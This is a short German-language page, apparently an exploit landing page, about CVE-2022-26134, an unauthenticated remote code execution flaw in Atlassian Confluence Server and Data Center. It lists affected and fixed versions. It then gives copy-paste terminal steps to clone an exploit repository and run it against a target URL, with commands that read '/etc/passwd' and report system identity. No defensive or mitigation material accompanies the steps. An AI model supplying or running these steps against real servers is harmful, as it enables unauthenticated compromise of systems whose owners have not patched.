
Atlassian Confluence (CVE-2022-26134) - Nicht authentifizierte Remote-Codeausführung (RCE)
Confluence Server und Data Center – CVE-2022-26134 – Kritische Sicherheitslücke für nicht authentifizierte Remote-Codeausführung
| Zusammenfassung | CVE-2022-26134 - Kritische Sicherheitslücke für nicht authentifizierte Remote-Codeausführung in Confluence Server und Data Center |
|---|---|
| Betroffene Produkte | Confluence Confluence Server Confluence Data Center |
| Betroffene Versionen | Alle unterstützten Versionen von Confluence Server und Data Center sind betroffen. Confluence Server- und Data Center-Versionen nach 1.3.0 sind betroffen. |
| Behobene Versionen | 7.4.17 7.13.7 7.14.3 7.15.2 7.16.4 7.17.4 7.18.1 |
Kopieren und fügen Sie Folgendes im Terminal ein:
git clone https://github.com/nxtexploit/CVE-2022-26134 ; cd CVE-2022-26134 ; pip install -r requirements.txt
python3 CVE-2022-26134.py https://target.com type-command-here
python3 CVE-2022-26134.py https://target.com "uname -a"
python3 CVE-2022-26134.py https://target.com "cat /etc/passwd"
python3 CVE-2022-26134.py https://target.com id
